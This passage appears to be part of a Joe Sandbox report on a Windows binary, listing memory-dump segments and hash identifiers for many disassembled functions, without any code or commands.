                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: b12337283fe58a1ae982f19855bdc68314bb18f96eaedbf97d3c33e1d47e9e1d
                                                                                                                                                                                                                                                                                  • Instruction ID: 3c612afae7554fea7f77352619cb14cd4a767c1f350c7d9bab6b8348186a7851
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b12337283fe58a1ae982f19855bdc68314bb18f96eaedbf97d3c33e1d47e9e1d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51D19266B09AC686EA14AB26EC502F5B3A1FF48B94FD44236CD2D07399CF3DD451CB60
                                                                                                                                                                                                                                                                                  Function 00007FF72F5C67F0 Relevance: .3, Instructions: 299COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: c2b67d53944cb5c55e2bb92377965104f8c7736282132103d9110c3b3426bf77
                                                                                                                                                                                                                                                                                  • Instruction ID: 0b0b837d9050217cee92df4c61cfb7cb69a3708f9554c7048366c189b254a9a7
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2b67d53944cb5c55e2bb92377965104f8c7736282132103d9110c3b3426bf77
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9E15D76B09AC682EB10AF16DC403B9A3E0FF08B98F841636DA5D07795DF3CE5508B64
                                                                                                                                                                                                                                                                                  Function 00007FF72F5C6190 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 8baaf20ad30f8a11e83a1753a6f0dac9e1f205e362e9e02b02714d8a0f111955
                                                                                                                                                                                                                                                                                  • Instruction ID: 34448f57afcb56351c93b5aa186acb9c3669da975262bdeeb5f6db4b0dfcbed0
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8baaf20ad30f8a11e83a1753a6f0dac9e1f205e362e9e02b02714d8a0f111955
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22D19E76B09B8286EB509F16ED843A9B7E4FB08B94F944135DA4E03B90DF3CE551CB60
                                                                                                                                                                                                                                                                                  Function 00007FF72F5D7C79 Relevance: .3, Instructions: 262COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 20d7dac9d533b3180a345ae923d8f6c9575024258e8af4de554390141a09baf3
                                                                                                                                                                                                                                                                                  • Instruction ID: e6ef4087237f78ce5061ee295c03d248868452b50f95eeed0dd332d7a14b0f7c
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20d7dac9d533b3180a345ae923d8f6c9575024258e8af4de554390141a09baf3
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4C1D276B0A6C686EB11AB26EC485F9B7A5FB49B84FD44236C91E13750CF3CE441CB20
                                                                                                                                                                                                                                                                                  Function 00007FF72F5B6A50 Relevance: .3, Instructions: 258COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 98840326572346ce62672058949bdb619bd28472bb45fe13b568a26b56bb2989
                                                                                                                                                                                                                                                                                  • Instruction ID: 70ff9c82748961624e1521b9545f918a473321944d76b90830af53f584486ae7
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98840326572346ce62672058949bdb619bd28472bb45fe13b568a26b56bb2989
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95C13B36B09AC686E660AF16EC542FAA3E0FB49748FD80135DA4E47355DF3CE4618F20
                                                                                                                                                                                                                                                                                  Function 00007FF72F653480 Relevance: .3, Instructions: 257COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: eed20e039dcc1a7adb761facd62eb612643325d2ef7b125a1d3c58e3026f862f
                                                                                                                                                                                                                                                                                  • Instruction ID: 44974b7e87f5d0c4baa43d38bb32c6b208333f3ee63f0ffcf260ee114c860149
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eed20e039dcc1a7adb761facd62eb612643325d2ef7b125a1d3c58e3026f862f
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37A1B163B0D29185E655AB12AD113BAF6ABFB80F94F885035EE8E167C4DB3CD481DF10
                                                                                                                                                                                                                                                                                  Function 00007FF72F5D3F60 Relevance: .3, Instructions: 255COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 6f495caaedb7263532d1806f88f0ff8ac8a82c62e595ec08781830e007608e81
                                                                                                                                                                                                                                                                                  • Instruction ID: 2690caec99fa4e3fa4ffc89f9dab8bee65d0f653ce65aa4b2473d5fa4618e377
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f495caaedb7263532d1806f88f0ff8ac8a82c62e595ec08781830e007608e81
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19C19236B19AC682EA04AB4AED505B8B3A5FB487A0FC44237D97D47794CF3DE451CB20
                                                                                                                                                                                                                                                                                  Function 00007FF72F5DF280 Relevance: .3, Instructions: 254COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: e8839e0e3ad3752fbee51db35c45455f694ce765d77fd982f1e164920b5e77ec
                                                                                                                                                                                                                                                                                  • Instruction ID: 62694a0aaae96be82e00c5350df22a6ed0461c85d71fe7f19ca7849aedb7d559
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8839e0e3ad3752fbee51db35c45455f694ce765d77fd982f1e164920b5e77ec
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4B1AE62B1AAD582EA00EF16E8447A8B3E5FB44BA4F954236DA7D477C4DF3CE441CB10
                                                                                                                                                                                                                                                                                  Function 00007FF72F5DE540 Relevance: .2, Instructions: 220COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 96fea93f446af114b9064da49687705947baa9860f6c7a3c23dd91d3fd028b50
                                                                                                                                                                                                                                                                                  • Instruction ID: 4708949b3c250f8d0cc8f0c2299964769c36daaf723b2a8295498e250b24380b
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96fea93f446af114b9064da49687705947baa9860f6c7a3c23dd91d3fd028b50
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F91B425F2AFCA86E547A7366C511F4D265EF6A7C1AD88372D81F32750EF2C70829920
                                                                                                                                                                                                                                                                                  Function 00007FF72F5DB180 Relevance: .2, Instructions: 218COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 2a85621e283accacced8221b17d10a49faa8c26bd841f71e3662727ff5320864
                                                                                                                                                                                                                                                                                  • Instruction ID: 4e8ed7c20594fe44988c5bd5f50820ddf8c3a7d958315b2b42fc56d3f284d1ce
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a85621e283accacced8221b17d10a49faa8c26bd841f71e3662727ff5320864
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97918466B0AE9696EA14EB06DC402F9B7A2FB45BA4FC54136CA2E47794DF3CD041CB10
                                                                                                                                                                                                                                                                                  Function 00007FF72F5DBBA0 Relevance: .2, Instructions: 212COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 79e7110b9251933381237f45dafbe83c08329d0dfb3fdd3f62539a26e3327acb
                                                                                                                                                                                                                                                                                  • Instruction ID: 74aa197d1170ff41250541a56fcc96d57e0690185b1cde2125c3d0cb69a99bd4
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79e7110b9251933381237f45dafbe83c08329d0dfb3fdd3f62539a26e3327acb
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7481B322B06A9692EA04EB0AD8446B9B7A2FB45BE0FC54636DA3D473D4DF7CD441C710
                                                                                                                                                                                                                                                                                  Function 00007FF72F601910 Relevance: .2, Instructions: 209COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 2a0a653bd8412369acd8b18e9d6f980586c5921261b9fc202eb3e07ecbb7d49b
                                                                                                                                                                                                                                                                                  • Instruction ID: dacb054171c16a84f9525206ce5750090b4dcfcd10d8c76084653c23cfc3d365
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a0a653bd8412369acd8b18e9d6f980586c5921261b9fc202eb3e07ecbb7d49b
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FEA14C75B08A8296F710AF25EC912F9A7A6FB48B84FE00136DD4E137A4DE7CA144CB50
                                                                                                                                                                                                                                                                                  Function 00007FF72F5AA8B0 Relevance: .2, Instructions: 206COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 52f6d5e490fbb126a6ff7b1701bbe82b2d86a503b07016c15d5eb3855ba6564f
